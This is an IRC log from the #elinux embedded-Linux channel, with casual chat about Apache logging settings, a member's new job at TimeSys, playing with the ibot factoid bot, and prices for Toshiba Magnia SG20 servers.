17:57.22 | *** join/#elinux lossy (~drago@p3EE2FF74.dip.t-dialin.net) |
17:57.51 | *** part/#elinux lossy (~drago@p3EE2FF74.dip.t-dialin.net) |
17:59.02 | sorphin | hmm.. all my logs have are codered/nimda and that formmail |
17:59.05 | sorphin | i feel left out ;) |
18:00.21 | sorphin | Morn: http://httpd.apache.org/docs/suexec.html |
18:00.55 | Morn | and if it was something like that I would expect others to be seeing this too |
18:01.33 | sorphin | i don't think many people leave their apache "Default" |
18:01.36 | sorphin | i build my own ;p |
18:02.42 | Morn | I do a bit, but I leave some alone |
18:02.52 | Morn | I don't think it is suexec though |
18:02.52 | Morn | since the process runs as the apache user |
18:03.09 | sorphin | only thing i can thikn of atm |
18:04.25 | sorphin | might wanna bump up your logging? |
18:05.18 | Morn | suexec is removed |
18:06.11 | Morn | LogLevel debug ?? |
18:06.41 | sorphin | that should help |
18:06.52 | sorphin | set it only for your webserver only |
18:06.54 | sorphin | not any vhosts |
18:07.01 | Morn | right |
20:02.16 | *** join/#elinux ibot (ibot@rikers.org) |
20:02.16 | *** topic/#elinux is Embedded Linux || http://eLinux.org/ || cross compile, uClibc, busybox, tinylogin, handhelds, post-sale linux installs ;-), etc. || debian-handheld list is up. |
20:02.16 | *** mode/#eLinux [+o ibot] by ChanServ |
20:12.31 | sorphin | ibot: wb |
20:12.32 | | It's great to be back! |
20:33.59 | *** join/#elinux sjhill (~NOYB@207-191-210-241.cpe.ats.mcleodusa.net) |
20:34.06 | prpplague | sjhill: lo ho |
20:34.19 | prpplague | sjhill: are you still a jobless bum? |
20:34.31 | sjhill | prpplague: nope, moving to pittsburgh this weekend |
20:34.41 | prpplague | sjhill: pittsburgh? eww |
20:34.55 | sjhill | prpplague: it's getting to be a nice city |
20:35.18 | prpplague | sjhill: what kinda job? |
20:35.41 | sjhill | prpplague: TimeSys - real-time embedded Linux |
20:35.47 | prpplague | sjhill: cool |
20:36.01 | prpplague | sjhill: congrads |
20:36.06 | *** join/#elinux Morn (~julie@ultrasparc.ipv6.magenet.com) [NETSPLIT VICTIM] |
20:36.07 | sjhill | thx |
20:36.14 | sjhill | hi sorphin |
20:36.16 | prpplague | sjhill: $250k/year right? |
20:36.19 | sjhill | lo' Lethal |
20:36.35 | sjhill | prpplague: heh, no, but i got my same salary i had at Broadcom...so i'm happy |
20:36.56 | prpplague | sjhill: what about moving expenses? |
20:40.08 | sjhill | all covered |
20:40.12 | sorphin | sjhill: lo |
20:40.42 | sjhill | bbl guys |
20:41.14 | CosmicPenguin | 32 people... arn't we popular |
20:57.41 | *** part/#elinux da-ve (~dave@212.204.35.114) |
21:10.41 | theDevil- | hehe |
21:16.54 | sorphin | <theDevil-> made me do it :P |
21:21.52 | kergoth | ibot: perl's buildsystem |
21:21.53 | | methinks perl's buildsystem is the devil! |
21:21.57 | kergoth | heheh |
21:24.31 | sorphin | heh |
21:24.35 | sorphin | Rick Berman Doesn't Know Why Nemesis Tanked |
21:24.41 | sorphin | because Rick Berman sucks |
21:27.31 | prpplague | ya get a clue |
21:27.53 | sorphin | ibot: digi |
21:27.53 | | sorphin: have you tried http://www.tldp.org/ ? |
21:27.57 | sorphin | bah |
21:28.20 | sorphin | ibot: digi is hell, and kergoth is it's slave. |
21:28.21 | | okay, sorphin |
21:28.27 | kergoth | truee that |
21:28.28 | sorphin | ibot: digi? |
21:28.28 | | [digi] hell, and kergoth is it's slave. |
21:28.38 | sorphin | doh |
21:28.55 | sorphin | ibot: no digi is digi is hell, and kergoth is its slave. |
21:28.56 | | sorphin: I think you lost me on that one |
21:29.03 | sorphin | ibot: forget digi |
21:29.03 | | i forgot digi, sorphin |
21:29.06 | kergoth | need a comma after the no |
21:29.10 | sorphin | ibot: digi is digi is hell, and kergoth is its slave. |
21:29.10 | | I think you lost me on that one, sorphin |
21:29.27 | sorphin | ibot: digi is hell and kergoth is its slave. |
21:29.28 | | okay, sorphin |
21:29.34 | sorphin | ibot: digi |
21:29.34 | | digi is, like, hell and kergoth is its slave. |
21:29.39 | sorphin | coo |
22:06.59 | *** join/#elinux TheMasterMind1 (foobar@h-69-3-152-153.MCLNVA23.covad.net) |
22:58.33 | *** part/#elinux Rocinante ([MFzRVPw2O@12-254-194-122.client.attbi.com) |
23:04.27 | pattieja | kergoth: I called DataComm Warehouse about the Magnia SG20 server |
23:04.42 | kergoth | pattieja: ah, what'd they have to say? |
23:05.04 | pattieja | kergoth: they couldn't give me an answer on the discrepancy between them selling the units for $300 and Toshiba (the vendor) selling them for $1400 |
23:05.48 | pattieja | plus, they're selling the unit that only has 1 20GB HDD and a PCMCIA slot (empty of course) which is "WiFi-ready" Ooooh! |
23:05.57 | kergoth | hehe |
23:06.04 | pattieja | the Wireless network adapter is extra |
23:06.46 | pattieja | the salesman didn't really know how long they would be able to carry the model and I suppose it's really up to how long/how many Celeron 566's Intel is going to continue to make |
23:06.51 | kergoth | I ended up picking one up off ebay, new, w/ 2 20gb for $250. course tthat doesnt help you tryiong to use them for a customer.. but fyi thats what they run for amongst individuals |
23:06.59 | pattieja | that and whether the CPU is embedded on the board or replaceable |
23:07.12 | pattieja | interesting |
23:07.21 | kergoth | hmm, I'll open mine up when i receive it and let you know |
23:07.23 | pattieja | Tiger's got 'em for $45 more |
23:07.33 | pattieja | 294.99 or similar |
23:09.19 | pattieja | kergoth: I'd really appreciate it. :) |
23:11.26 | *** join/#elinux TomW (tom@24.229.147.16) |
23:12.17 | TomW | sorphin: I'm awake again. :) |
23:12.46 | TomW | sorphin: one more 8051 program to go and then I can play with WebPal! |
23:20.22 | *** join/#elinux Morn (~julie@ultrasparc.ipv6.magenet.com) |
23:27.39 | *** join/#elinux mastermnd (~mastermnd@h004854622ae6.ne.client2.attbi.com) |
23:54.10 | sieve | g'night all |